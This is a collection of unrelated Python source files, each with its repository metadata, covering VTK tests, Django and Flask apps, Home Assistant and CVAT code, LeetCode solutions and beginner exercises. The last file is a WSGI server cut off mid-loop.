tail = 0
import random
for element in range (1, 5001):
toss = round(random.random())
if (toss == 1):
head += 1
toss_text='head'
else:
tail += 1
toss_text = 'tail'
print "Attempt #{}: Throwing a coin... It's a {}! ... Got {} head(s) so far and {} tail(s) so far".format(element,toss_text,head,tail)
print 'Ending the program, thank you!'
|
[
"43941751+curest0x1021@users.noreply.github.com"
] |
43941751+curest0x1021@users.noreply.github.com
|
5d1e945d40520440e25f880459d35743a8ad7393
|
77c518b87e67e9926d130f856a7edb12302596eb
|
/Filters/Core/Testing/Python/MassProperties.py
|
3753d7e93c51cd9108d83665ac7f0756038d055d
|
[
"BSD-3-Clause"
] |
permissive
|
t3dbrida/VTK
|
73e308baa1e779f208421a728a4a15fec5c4f591
|
e944bac3ba12295278dcbfa5d1cd7e71d6457bef
|
refs/heads/master
| 2023-08-31T21:01:58.375533
| 2019-09-23T06:43:00
| 2019-09-23T06:43:00
| 139,547,456
| 2
| 0
|
NOASSERTION
| 2019-11-22T14:46:48
| 2018-07-03T07:49:14
|
C++
|
UTF-8
|
Python
| false
| false
| 4,779
|
py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
'''
=========================================================================
Program: Visualization Toolkit
Module: TestNamedColorsIntegration.py
Copyright (c) Ken Martin, Will Schroeder, Bill Lorensen
All rights reserved.
See Copyright.txt or http://www.kitware.com/Copyright.htm for details.
This software is distributed WITHOUT ANY WARRANTY; without even
the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR
PURPOSE. See the above copyright notice for more information.
=========================================================================
'''
import StringIO
import sys
import vtk
import vtk.test.Testing
from vtk.util.misc import vtkGetDataRoot
VTK_DATA_ROOT = vtkGetDataRoot()
class MassProperties(vtk.test.Testing.vtkTest):
def testMassProperties(self):
# Create the RenderWindow, Renderer and both Actors
#
ren = vtk.vtkRenderer()
renWin = vtk.vtkRenderWindow()
renWin.AddRenderer(ren)
cone = vtk.vtkConeSource()
cone.SetResolution(50)
sphere = vtk.vtkSphereSource()
sphere.SetPhiResolution(50)
sphere.SetThetaResolution(50)
cube = vtk.vtkCubeSource()
cube.SetXLength(1)
cube.SetYLength(1)
cube.SetZLength(1)
sphereMapper = vtk.vtkPolyDataMapper()
sphereMapper.SetInputConnection(sphere.GetOutputPort())
sphereActor = vtk.vtkActor()
sphereActor.SetMapper(sphereMapper)
sphereActor.GetProperty().SetDiffuseColor(1, .2, .4)
coneMapper = vtk.vtkPolyDataMapper()
coneMapper.SetInputConnection(cone.GetOutputPort())
coneActor = vtk.vtkActor()
coneActor.SetMapper(coneMapper)
coneActor.GetProperty().SetDiffuseColor(.2, .4, 1)
cubeMapper = vtk.vtkPolyDataMapper()
cubeMapper.SetInputConnection(cube.GetOutputPort())
cubeActor = vtk.vtkActor()
cubeActor.SetMapper(cubeMapper)
cubeActor.GetProperty().SetDiffuseColor(.2, 1, .4)
#Add the actors to the renderer, set the background and size
#
sphereActor.SetPosition(-5, 0, 0)
ren.AddActor(sphereActor)
coneActor.SetPosition(0, 0, 0)
ren.AddActor(coneActor)
coneActor.SetPosition(5, 0, 0)
ren.AddActor(cubeActor)
tf = dict()
mp = dict()
vt = dict()
pdm = dict()
ta = dict()
def MakeText(primitive):
tf.update({primitive: vtk.vtkTriangleFilter()})
tf[primitive].SetInputConnection(primitive.GetOutputPort())
mp.update({primitive: vtk.vtkMassProperties()})
mp[primitive].SetInputConnection(tf[primitive].GetOutputPort())
# here we capture stdout and write it to a variable for processing.
summary = StringIO.StringIO()
# save the original stdout
old_stdout = sys.stdout
sys.stdout = summary
print mp[primitive]
summary = summary.getvalue()
startSum = summary.find(" VolumeX")
endSum = len(summary)
print summary[startSum:]
# Restore stdout
sys.stdout = old_stdout
vt.update({primitive: vtk.vtkVectorText()})
vt[primitive].SetText(summary[startSum:])
pdm.update({primitive: vtk.vtkPolyDataMapper()})
pdm[primitive].SetInputConnection(vt[primitive].GetOutputPort())
ta.update({primitive: vtk.vtkActor()})
ta[primitive].SetMapper(pdm[primitive])
ta[primitive].SetScale(.2, .2, .2)
return ta[primitive]
ren.AddActor(MakeText(sphere))
ren.AddActor(MakeText(cube))
ren.AddActor(MakeText(cone))
ta[sphere].SetPosition(sphereActor.GetPosition())
ta[sphere].AddPosition(-2, -1, 0)
ta[cube].SetPosition(cubeActor.GetPosition())
ta[cube].AddPosition(-2, -1, 0)
ta[cone].SetPosition(coneActor.GetPosition())
ta[cone].AddPosition(-2, -1, 0)
ren.SetBackground(0.1, 0.2, 0.4)
renWin.SetSize(786, 256)
# render the image
#
ren.ResetCamera()
cam1 = ren.GetActiveCamera()
cam1.Dolly(3)
ren.ResetCameraClippingRange()
# render and interact with data
iRen = vtk.vtkRenderWindowInteractor()
iRen.SetRenderWindow(renWin);
renWin.Render()
img_file = "MassProperties.png"
vtk.test.Testing.compareImage(iRen.GetRenderWindow(), vtk.test.Testing.getAbsImagePath(img_file), threshold=25)
vtk.test.Testing.interact()
if __name__ == "__main__":
vtk.test.Testing.main([(MassProperties, 'test')])
|
[
"nikhil.shetty@kitware.com"
] |
nikhil.shetty@kitware.com
|
b589b99088f59ac54b08810c679c36224ffbb831
|
b00b570c551044438c0cc2f10d13458dc06d7613
|
/blog/manage.py
|
04b540c28bb66d56d0fd30fdc4ac7f885faba4a4
|
[] |
no_license
|
shiretree/Blog
|
a938885d84265dfdafb338a4f226f0f52bb1cb10
|
9ed94c4a59468c2dea30c17cfdfe396f3e1e40b9
|
refs/heads/master
| 2020-08-18T18:33:39.991254
| 2019-10-25T15:31:35
| 2019-10-25T15:31:35
| 215,821,661
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 868
|
py
|
#!/usr/bin/env python
import os
import sys
if __name__ == "__main__":
profile = os.environ.get('blog_PROFILE','develop')
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "blog.setting.%s" %profile)
try:
from django.core.management import execute_from_command_line
except ImportError:
# The above import may fail for some other reason. Ensure that the
# issue is really that Django is missing to avoid masking other
# exceptions on Python 2.
try:
import django
except ImportError:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
)
raise
execute_from_command_line(sys.argv)
|
[
"email"
] |
email
|
237d8804034a2eb54bcae35783ec451375f13cef
|
60a831fb3c92a9d2a2b52ff7f5a0f665d4692a24
|
/IronPythonStubs/release/stubs.min/System/Security/AccessControl_parts/SemaphoreAuditRule.py
|
4209494d452e4bc8c10f25f9e20fabe9f90a6b55
|
[
"MIT"
] |
permissive
|
shnlmn/Rhino-Grasshopper-Scripts
|
a9411098c5d1bbc55feb782def565d535b27b709
|
0e43c3c1d09fb12cdbd86a3c4e2ba49982e0f823
|
refs/heads/master
| 2020-04-10T18:59:43.518140
| 2020-04-08T02:49:07
| 2020-04-08T02:49:07
| 161,219,695
| 11
| 2
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 772
|
py
|
class SemaphoreAuditRule(AuditRule):
"""
Represents a set of access rights to be audited for a user or group. This class cannot be inherited.
SemaphoreAuditRule(identity: IdentityReference,eventRights: SemaphoreRights,flags: AuditFlags)
"""
@staticmethod
def __new__(self,identity,eventRights,flags):
""" __new__(cls: type,identity: IdentityReference,eventRights: SemaphoreRights,flags: AuditFlags) """
pass
AccessMask=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets the access mask for this rule.
"""
SemaphoreRights=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets the access rights affected by the audit rule.
Get: SemaphoreRights(self: SemaphoreAuditRule) -> SemaphoreRights
"""
|
[
"magnetscoil@gmail.com"
] |
magnetscoil@gmail.com
|
bc1dbcc61274452333d727b7e2e93d0812fbc166
|
9222114c0b39007eb1af715cf18fc95ff282b38c
|
/problems/725. Split Linked List in Parts/2 - Hash Table.py
|
297fd75088427c8359ee2f838bbe5019b7190014
|
[] |
no_license
|
Vasilic-Maxim/LeetCode-Problems
|
1a2a09edca6489a349e5d69d087279630cff157d
|
359f3b78da90c41c7e42e5c9e13d49b4fc67fe41
|
refs/heads/master
| 2021-07-10T22:03:29.327658
| 2021-06-07T12:42:52
| 2021-06-07T12:42:52
| 246,826,450
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 821
|
py
|
from typing import List, Any
class ListNode:
def __init__(self, val=0, next=None):
self.val = val
self.next = next
class Solution:
def splitListToParts(self, root: ListNode, k: int) -> List[Any]:
"""
We always pay with time proportional to O(n + k). The worst
case arises when k > n.
Time: O(n + k)
Space: O(n + k)
"""
ids = []
while root is not None:
ids.append(root)
root = root.next
result = [None] * k
div, mod = divmod(len(ids), k)
start = 0
for i in range(k):
if start < len(ids):
result[i] = ids[start]
start += div + (mod > 0)
ids[start - 1].next = None
mod -= 1
return result
|
[
"lmantenl@gmail.com"
] |
lmantenl@gmail.com
|
788645067729b6ef213aed8af530ea537fe1dbbd
|
f90bb6e4a0d47c2c78362e431b47f74395bd42dd
|
/BitwiseORofSubarray.py
|
86117d5012ccf447c11b90a59621899ac47e9c1f
|
[] |
no_license
|
sainihimanshu1999/Dynamic-Programming
|
bc8811d10625af3bc4b81a4eb219b9b84f4e6821
|
65427f049b8b671e2a412497bbb06de8e8497823
|
refs/heads/main
| 2023-04-20T13:53:53.031324
| 2021-05-15T18:03:45
| 2021-05-15T18:03:45
| 365,940,831
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 519
|
py
|
'''
Bitwise or compares each bit of the number and return 1 when one of the bit is one of two numbers.
In this question we are making at list of set of the existing numbers and, then calculating the or
of last number with previous number and then saving the value in a set
'''
def bitWiseOr(self,nums):
table = [set(nums[i]) for i in range(len(nums))]
for i in range(1,len(nums)):
for pre in table[i-1]:
table[i].add(nums[i]|pre)
return len(set.union(*table)) if len(nums)>0 else 0
|
[
"sainihimanshu.1999@gmail.com"
] |
sainihimanshu.1999@gmail.com
|
6a34c022805208c44b234f2c301f4a94bd5a5713
|
3e3a835ee885eb9a71fd35ea58acd04361f72f47
|
/python基础/面向对象.py/老王开枪.py
|
7fb0d19a6621dfb5e9adef0e085cdce4217afadd
|
[] |
no_license
|
hanfang302/py-
|
dbb259f24e06fbe1a900df53ae6867acb8cb54ea
|
dd3be494ccef5100c0f06ed936f9a540d8ca0995
|
refs/heads/master
| 2020-03-16T01:59:57.002135
| 2018-05-07T12:02:21
| 2018-05-07T12:02:21
| 132,454,341
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,478
|
py
|
# 人类
class Ren:
def __init__(self,name):
self.name = name
self.xue = 100
self.qiang = None
def __str__(self):
return self.name + '剩余的血量' + str(self.xue)
def anzidan(self,danjia,zidan):
danjia.baocunzidan(zidan)
def andanjia(self,qiang,danjia):
qiang.lianjiedanjia(danjia)
def naqiang(self,qiang):
self.qiang = qiang
def kaiqiang(self,diren):
self.qiang.she(diren)
def diaoxue(self,shashangli):
self.xue -= shashangli
# 弹夹类
class Danjia:
def __init__(self,rongliang):
self.rongliang = rongliang
self.rongnaList = []
def __str__(self):
return '弹夹当前的子弹的数量为:' + str(len(self.rongnaList)) + '/' + str(self.rongliang)
def baocunzidan(self,zidan):
if len(self.rongnaList) < self.rongliang:
self.rongnaList.append(zidan)
def chuzidan(self):
# 判断当前弹夹中是否还有子弹
if len(self.rongnaList) > 0:
# 获取最后压入到弹夹中的子弹
zidan = self.rongnaList[-1]
self.rongnaList.pop()
return zidan
else:
return None
# 子弹类
class Zidan:
def __init__(self,shashangli):
self.shashangli = shashangli
def shanghai(self,diren):
diren.diaoxue(self.shashangli)
#枪类
class Qiang:
def __init__(self):
self.danjia = None
def __str__(self):
if self.danjia:
return '枪当前有弹夹'
else:
return '枪没有弹夹'
def lianjiedanjia(self,danjia):
if not self.danjia:
self.danjia = danjia
def she(self,diren):
zidan = self.danjia.chuzidan()
if zidan:
zidan.shanghai(diren)
else:
print('没有子弹,放了枪---')
# 创建一个人的对象
laowang = Ren('老王')
# 创建一个弹夹
danjia = Danjia(20)
print(danjia)
# 循环的方式创建一颗子弹,然后让老王把这颗子弹压入到弹夹中
i = 0
while i<5:
zidan = Zidan(5)
laowang.anzidan(danjia,zidan)
i += 1
# 测试一下,安装完子弹后,弹夹中的信息
print(danjia)
# 创建一个枪的对象
qiang = Qiang()
print(qiang)
# 创建一个敌人
diren = Ren('敌人')
print(diren)
# 让老王那枪
laowang.naqiang(qiang)
# 老王开枪设人
laowang.kaiqiang(diren)
print(diren)
print(danjia)
|
[
"hanfang123@aliyun.com"
] |
hanfang123@aliyun.com
|
ccf114278c3df46b18fe342b6d5710fdad5037a8
|
dac12c9178b13d60f401c4febff5569af8aa2719
|
/cvat-sdk/cvat_sdk/core/utils.py
|
1708dfd5779affd0d04466cf7bdec0ce4858f5c8
|
[
"LGPL-2.0-or-later",
"MIT",
"GPL-1.0-or-later"
] |
permissive
|
opencv/cvat
|
39dc66ca20f972ba40b79c44d7ce43590dc0b0b5
|
899c9fd75146744def061efd7ab1b1c6c9f6942f
|
refs/heads/develop
| 2023-08-19T04:27:56.974498
| 2023-08-18T09:58:25
| 2023-08-18T09:58:25
| 139,156,354
| 6,558
| 1,887
|
MIT
| 2023-09-14T12:44:39
| 2018-06-29T14:02:45
|
TypeScript
|
UTF-8
|
Python
| false
| false
| 2,077
|
py
|
# Copyright (C) 2022 CVAT.ai Corporation
#
# SPDX-License-Identifier: MIT
from __future__ import annotations
import contextlib
import itertools
import os
from typing import (
IO,
Any,
BinaryIO,
ContextManager,
Dict,
Iterator,
Literal,
Sequence,
TextIO,
Union,
overload,
)
def filter_dict(
d: Dict[str, Any], *, keep: Sequence[str] = None, drop: Sequence[str] = None
) -> Dict[str, Any]:
return {k: v for k, v in d.items() if (not keep or k in keep) and (not drop or k not in drop)}
@overload
def atomic_writer(path: Union[os.PathLike, str], mode: Literal["wb"]) -> ContextManager[BinaryIO]:
...
@overload
def atomic_writer(
path: Union[os.PathLike, str], mode: Literal["w"], encoding: str = "UTF-8"
) -> ContextManager[TextIO]:
...
@contextlib.contextmanager
def atomic_writer(
path: Union[os.PathLike, str], mode: Literal["w", "wb"], encoding: str = "UTF-8"
) -> Iterator[IO]:
"""
Returns a context manager that, when entered, returns a handle to a temporary
file opened with the specified `mode` and `encoding`. If the context manager
is exited via an exception, the temporary file is deleted. If the context manager
is exited normally, the file is renamed to `path`.
In other words, this function works like `open()`, but the file does not appear
at the specified path until and unless the context manager is exited
normally.
"""
path_str = os.fspath(path)
for counter in itertools.count():
tmp_path = f"{path_str}.tmp{counter}"
try:
if mode == "w":
tmp_file = open(tmp_path, "xt", encoding=encoding)
elif mode == "wb":
tmp_file = open(tmp_path, "xb")
else:
raise ValueError(f"Unsupported mode: {mode!r}")
break
except FileExistsError:
pass # try next counter value
try:
with tmp_file:
yield tmp_file
os.rename(tmp_path, path)
except:
os.unlink(tmp_path)
raise
|
[
"noreply@github.com"
] |
opencv.noreply@github.com
|
e53556e3a604085aa6f7add4581285a4e52224d2
|
96dcea595e7c16cec07b3f649afd65f3660a0bad
|
/homeassistant/components/sensorpro/device.py
|
326eb8b8bbd743ce3d1776ded36c6a74498130aa
|
[
"Apache-2.0"
] |
permissive
|
home-assistant/core
|
3455eac2e9d925c92d30178643b1aaccf3a6484f
|
80caeafcb5b6e2f9da192d0ea6dd1a5b8244b743
|
refs/heads/dev
| 2023-08-31T15:41:06.299469
| 2023-08-31T14:50:53
| 2023-08-31T14:50:53
| 12,888,993
| 35,501
| 20,617
|
Apache-2.0
| 2023-09-14T21:50:15
| 2013-09-17T07:29:48
|
Python
|
UTF-8
|
Python
| false
| false
| 442
|
py
|
"""Support for SensorPro devices."""
from __future__ import annotations
from sensorpro_ble import DeviceKey
from homeassistant.components.bluetooth.passive_update_processor import (
PassiveBluetoothEntityKey,
)
def device_key_to_bluetooth_entity_key(
device_key: DeviceKey,
) -> PassiveBluetoothEntityKey:
"""Convert a device key to an entity key."""
return PassiveBluetoothEntityKey(device_key.key, device_key.device_id)
|
[
"noreply@github.com"
] |
home-assistant.noreply@github.com
|
a53c1b3c8f40c312958b8b0d54c48ea0ac2ffa34
|
824f831ce0921b3e364060710c9e531f53e52227
|
/Leetcode/Arrays/LC-287. Find the Duplicate Number.py
|
5901d94bc86c781e7f2bae0c1ee771b979e4f97d
|
[] |
no_license
|
adityakverma/Interview_Prepration
|
e854ff92c10d05bc2c82566ea797d2ce088de00a
|
d08a7f728c53943e9a27c33f8e4249633a69d1a6
|
refs/heads/master
| 2020-04-19T19:36:06.527353
| 2019-06-15T23:02:30
| 2019-06-15T23:02:30
| 168,392,921
| 0
| 2
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,076
|
py
|
# Given an array nums containing n + 1 integers where each integer is between 1 and n (inclusive),
# prove that at least one duplicate number must exist. Assume that there is only one duplicate
# number, find the duplicate one.
# Example 1:
#
# Input: [1,3,4,2,2]
# Output: 2
#
# Example 2:
#
# Input: [3,1,3,4,2]
# Output: 3
# =================================================================================================
# Excellent Binary Search Solution: O(nlogn)
# https://leetcode.com/problems/find-the-duplicate-number/discuss/72844/Two-Solutions-(with-explanation):-O(nlog(n))-and-O(n)-time-O(1)-space-without-changing-the-input-array
def findDuplicate(self, nums):
"""
:type nums: List[int]
:rtype: int
"""
low = 1
high = len(nums) - 1
while low <= high:
mid = low + (high - low) / 2
count = 0
for i in nums:
if i <= mid:
count += 1
if count > mid:
high = mid - 1
# print "lower half. low & high are", low, high
else:
low = mid + 1
# print "upper half. low & high are", low, high
return low
'''
This solution is based on binary search.
At first the search space is numbers between 1 to n. Each time I select a number mid (which is the one in the middle) and count all the numbers equal to or less than mid. Then if the count is more than mid, the search space will be [1 mid] otherwise [mid+1 n]. I do this until search space is only one number.
Let's say n=10 and I select mid=5. Then I count all the numbers in the array which are less than equal mid. If the there are more than 5 numbers that are less than 5, then by Pigeonhole Principle (https://en.wikipedia.org/wiki/Pigeonhole_principle) one of them has occurred more than once. So I shrink the search space from [1 10] to [1 5]. Otherwise the duplicate number is in the second half so for the next step the search space would be [6 10].
'''
#------------------------
# Regular logic
'''
def findDuplicate(self, nums):
"""
:type nums: List[int]
:rtype: int
"""
nums.sort()
for i in range(1, len(nums)):
if nums[i] == nums[i-1]:
return nums[i]
'''
#---------------------------
# Cycle Detection Solution - O(n)
# https://leetcode.com/problems/find-the-duplicate-number/discuss/72846/My-easy-understood-solution-with-O(n)-time-and-O(1)-space-without-modifying-the-array.-With-clear-explanation.
# https://leetcode.com/problems/find-the-duplicate-number/solution/#
'''
def findDuplicate(self, nums):
# Find the intersection point of the two runners.
tortoise = nums[0]
hare = nums[0]
while True:
tortoise = nums[tortoise]
hare = nums[nums[hare]]
if tortoise == hare:
break
# Find the "entrance" to the cycle.
ptr1 = nums[0]
ptr2 = tortoise
while ptr1 != ptr2:
ptr1 = nums[ptr1]
ptr2 = nums[ptr2]
return ptr1
'''
|
[
"noreply@github.com"
] |
adityakverma.noreply@github.com
|
0cef47601e24ce2571e4fae9c030c83522f29d60
|
4505ae4b6fee0e32d799f22c32b18f79884daef4
|
/src/keras/tests/test_loss_masking.py
|
36ad471de77211bb1b4ed6288f94f34c0bdec80b
|
[
"MIT",
"Apache-2.0"
] |
permissive
|
lu791019/iii_HA_Image_Recognition_DL
|
5cde9c2d0c06f8fe3fb69991b27fda87d42450e1
|
d5f56d62af6d3aac1c216ca4ff309db08a8c9072
|
refs/heads/master
| 2020-08-03T06:56:05.345175
| 2019-09-29T13:20:24
| 2019-09-29T13:20:24
| 211,660,905
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,531
|
py
|
import numpy as np
import pytest
from keras.models import Sequential
from keras.engine.training_utils import weighted_masked_objective
from keras.layers import TimeDistributed, Masking, Dense
from keras import losses
from keras import backend as K
def create_masking_model():
model = Sequential()
model.add(Masking(mask_value=0, input_shape=(None, 1)))
model.add(TimeDistributed(Dense(1, kernel_initializer='one')))
model.compile(loss='mse', optimizer='sgd')
return model
def test_masking():
np.random.seed(1337)
x = np.array([[[1], [1]],
[[0], [0]]])
model = create_masking_model()
y = np.array([[[1], [1]],
[[1], [1]]])
loss = model.train_on_batch(x, y)
assert loss == 0
def test_masking_is_all_zeros():
x = y = np.array([[[0], [0]]])
model = create_masking_model()
loss = model.train_on_batch(x, y)
assert loss == 0
def test_loss_masking():
weighted_loss = weighted_masked_objective(losses.get('mae'))
shape = (3, 4, 2)
x = np.arange(24).reshape(shape)
y = 2 * x
# Normally the trailing 1 is added by standardize_weights
weights = np.ones((3,))
mask = np.ones((3, 4))
mask[1, 0] = 0
out = K.eval(weighted_loss(K.variable(x),
K.variable(y),
K.variable(weights),
K.variable(mask)))
if __name__ == '__main__':
pytest.main([__file__])
|
[
"noreply@github.com"
] |
lu791019.noreply@github.com
|
c67d6fe7ce1bebab2ccccf1fba0bb20116d81484
|
98a5677396a4fdaad36ff8bb67ca08a8a79f2c13
|
/example/toolbox/management/commands/createcalaccessrawmodeldocs.py
|
556aeea30f7002572d4f9c2ebe907c70da08d12d
|
[
"MIT"
] |
permissive
|
livlab/django-calaccess-raw-data
|
542255e5ad9ca50996163591cb7b0f24f57724ff
|
3fd8b7505e158cb3159603ce4f42e3508af9e0bf
|
refs/heads/master
| 2020-04-05T23:07:01.637833
| 2015-08-29T18:19:08
| 2015-08-29T18:19:08
| 41,603,060
| 1
| 0
| null | 2015-08-29T18:23:17
| 2015-08-29T18:23:17
| null |
UTF-8
|
Python
| false
| false
| 1,089
|
py
|
import os
from django.conf import settings
from calaccess_raw import get_model_list
from django.template.loader import render_to_string
from calaccess_raw.management.commands import CalAccessCommand
class Command(CalAccessCommand):
help = 'Generate documentation for raw CAL-ACCESS database models'
def handle(self, *args, **kwargs):
self.docs_dir = os.path.join(
settings.REPO_DIR,
'docs'
)
self.target_path = os.path.join(self.docs_dir, 'models.rst')
model_list = sorted(get_model_list(), key=lambda x:x().klass_name)
group_list = {}
for m in model_list:
try:
group_list[m().klass_group].append(m)
except KeyError:
group_list[m().klass_group] = [m]
group_list = sorted(group_list.items(), key=lambda x:x[0])
context = {
'group_list': group_list,
}
rendered = render_to_string('toolbox/models.rst', context)
with open(self.target_path, 'w') as target_file:
target_file.write(rendered)
|
[
"ben.welsh@gmail.com"
] |
ben.welsh@gmail.com
|
0b45f2cad03d55adf2caed48ec14aabf6dd1204f
|
4ee2ebef215cf879aafdfa44221f52d82775176a
|
/Inheritance/Exercise/03-Players_And_Monsters/project/wizard.py
|
6c54fe969f329c58c92fa42e89364eb28a5deac0
|
[] |
no_license
|
Avstrian/SoftUni-Python-OOP
|
d2a9653863cba7bc095e647cd3f0561377f10f6d
|
6789f005b311039fd46ef1f55f3eb6fa9313e5a6
|
refs/heads/main
| 2023-08-01T09:31:38.099842
| 2021-08-24T04:21:38
| 2021-08-24T04:21:38
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 238
|
py
|
from project.hero import Hero
class Wizard(Hero):
def __init__(self, username, level):
super().__init__(username, level)
def __str__(self):
return f"{self.username} of type Wizard has level {self.level}"
|
[
"noreply@github.com"
] |
Avstrian.noreply@github.com
|
14b95097ebef6310a10450b50fa85478aad59ebf
|
ef08d1e969a53c279e75b0120683eb3ec6914adf
|
/App/models.py
|
e0b07d140b75aa8ec9c5b43d15a64c2d31bf5e35
|
[] |
no_license
|
yuansuixin/learn-flask-city
|
7278fa567b5d6825fd2c121114495092c4612a09
|
f8bfd1d8daff9c18c1ee71f1770fdb83ce6dfa2f
|
refs/heads/master
| 2021-04-09T15:31:26.120510
| 2018-03-19T08:54:59
| 2018-03-19T08:54:59
| 125,822,109
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 759
|
py
|
from App.ext import model
class Provice(model.Model):
pid = model.Column(model.Integer,primary_key=True,autoincrement=True)
name = model.Column(model.String(32))
cities = model.relationship('City',backref='Provice',lazy='dynamic')
class City(model.Model):
cid = model.Column(model.Integer,primary_key=True,autoincrement=True)
name = model.Column(model.String(32))
provice = model.Column(model.Integer,model.ForeignKey(Provice.pid))
villages = model.relationship('Village', backref='City', lazy='dynamic')
class Village(model.Model):
vid = model.Column(model.Integer, primary_key=True, autoincrement=True)
name = model.Column(model.String(32))
city = model.Column(model.Integer, model.ForeignKey(City.cid))
|
[
"cyss428@163.com"
] |
cyss428@163.com
|
dbf46d8ca805cf2f79e58f27d726c87ea0b78fa6
|
264787b5f42d482db2ef0838b45ec79db71e6e2f
|
/home/views.py
|
1edd90b3506e5941e7f0205e6a6a010d7ff9f5b2
|
[] |
no_license
|
felipefoc/PrecoCertoChallenge2
|
f0700788f363ce9b72234a3d7df35ef1ea78d6b2
|
446854bc1823a06b207b30a10e14e71f7c982bee
|
refs/heads/main
| 2023-04-21T23:04:34.942298
| 2021-05-10T22:10:10
| 2021-05-10T22:10:10
| 366,187,651
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,431
|
py
|
from django.shortcuts import render
from django.views.generic import ListView
from home.models import Product, Order, ProductSold
from django.db.models import Q
import json
import datetime
def homeview(request):
with open('data.json', 'r+') as f:
data = json.load(f)
# y = ProductSold.objects.get(id=1)
# aa =ProductSold.objects.get(id=2)
# x = Order.objects.create(
# status='Finalizado',
# date=datetime.datetime.now(),
# total=10.00,
# )
# x.save()
# x.product_sold.add(y)
# x.product_sold.add(aa)
eita = Order.objects.all()
ob = Product.objects.all()
ab = ProductSold.objects.all()
for i in eita:
print(i.product_sold.quantity)
# for i in data['Orders']:
# print(i['Order']['ProductsSold'])
# sku = i['Order']['ProductsSold'][0]['ProductsSold']['sku']
# name = i['Order']['ProductsSold'][0]['ProductsSold']['name']
# quantity = i['Order']['ProductsSold'][0]['ProductsSold']['quantity']
# price = float(i['Order']['ProductsSold'][0]['ProductsSold']['price']) / int(quantity)
# cost_price = i['Order']['ProductsSold'][0]['ProductsSold']['cost_price']
# print(sku, name, quantity, price, cost_price)
return render(request, template_name='index.html', context={'data': ob, 'ab':ab, 'eita': eita})
# Create your views here.
# class HomeAPIView(ListView):
|
[
"felipemfmayer@gmail.com"
] |
felipemfmayer@gmail.com
|
e02f281a024f31c0d46eb8c5482cbf9893fe7f56
|
4c601eaa346e660c296e270cc2d79aea9a3721fe
|
/tests/components/homekit_controller/specific_devices/test_homeassistant_bridge.py
|
e9fc9b522ea9223ad12b87d8feb8101ae4925a4a
|
[
"Apache-2.0"
] |
permissive
|
basnijholt/home-assistant
|
f55110af9ff602274c0a929c7298ef97a0ef282f
|
ba55b4b8338a2dc0ba3f1d750efea49d86571291
|
refs/heads/dev
| 2023-01-21T11:53:52.621353
| 2020-08-08T15:03:06
| 2020-08-08T15:03:06
| 220,313,680
| 5
| 1
|
Apache-2.0
| 2023-01-13T06:04:49
| 2019-11-07T19:29:54
|
Python
|
UTF-8
|
Python
| false
| false
| 1,900
|
py
|
"""Test against characteristics captured from the Home Assistant HomeKit bridge running demo platforms."""
from homeassistant.components.fan import (
SUPPORT_DIRECTION,
SUPPORT_OSCILLATE,
SUPPORT_SET_SPEED,
)
from tests.components.homekit_controller.common import (
Helper,
setup_accessories_from_file,
setup_test_accessories,
)
async def test_homeassistant_bridge_fan_setup(hass):
"""Test that a SIMPLEconnect fan can be correctly setup in HA."""
accessories = await setup_accessories_from_file(
hass, "home_assistant_bridge_fan.json"
)
config_entry, pairing = await setup_test_accessories(hass, accessories)
entity_registry = await hass.helpers.entity_registry.async_get_registry()
# Check that the fan is correctly found and set up
fan_id = "fan.living_room_fan"
fan = entity_registry.async_get(fan_id)
assert fan.unique_id == "homekit-fan.living_room_fan-8"
fan_helper = Helper(
hass, "fan.living_room_fan", pairing, accessories[0], config_entry,
)
fan_state = await fan_helper.poll_and_get_state()
assert fan_state.attributes["friendly_name"] == "Living Room Fan"
assert fan_state.state == "off"
assert fan_state.attributes["supported_features"] == (
SUPPORT_DIRECTION | SUPPORT_SET_SPEED | SUPPORT_OSCILLATE
)
device_registry = await hass.helpers.device_registry.async_get_registry()
device = device_registry.async_get(fan.device_id)
assert device.manufacturer == "Home Assistant"
assert device.name == "Living Room Fan"
assert device.model == "Fan"
assert device.sw_version == "0.104.0.dev0"
bridge = device = device_registry.async_get(device.via_device_id)
assert bridge.manufacturer == "Home Assistant"
assert bridge.name == "Home Assistant Bridge"
assert bridge.model == "Bridge"
assert bridge.sw_version == "0.104.0.dev0"
|
[
"balloob@gmail.com"
] |
balloob@gmail.com
|
9b9c66415e4cc7864cca1de30a392308b4d18434
|
3deef77b752c9940ac1cbe35dbcfb6a9ede59c67
|
/12day/03.WSGIServer.py
|
d2a68325e7e005d5449172bdc125a07b9a6af31b
|
[] |
no_license
|
vstarman/python_codes
|
c682a4aa96e90172da6292f4e245da4a41c97531
|
64ddd38af6cf65861602620a0196bc460bc359d4
|
refs/heads/master
| 2021-09-05T01:31:55.882001
| 2018-01-23T12:43:45
| 2018-01-23T12:43:45
| 114,988,789
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,421
|
py
|
import socket, time, re, sys
class WSGIServer():
"""定义一个wsgi服务器的类"""
def __init__(self, documents_root, port=8080):
# creat
self.server_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
# reuse
self.server_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
# BIND
self.server_socket.bind(("", port))
# listen
self.server_socket.listen(128)
# 非阻塞
self.server_socket.setblocking(False)
# 存放client_socket
self.client_socket_list = []
self.documents_root = documents_root
def run_forever(self):
"""运行服务器"""
while True:
try:
#time.sleep(0.5)
new_socket, new_addr = self.server_socket.accept()
except Exception as e:
print("---------1---------",e)
else:
new_socket.setblocking(False)
self.client_socket_list.append(new_socket)
for client_socket in self.client_socket_list:
try:
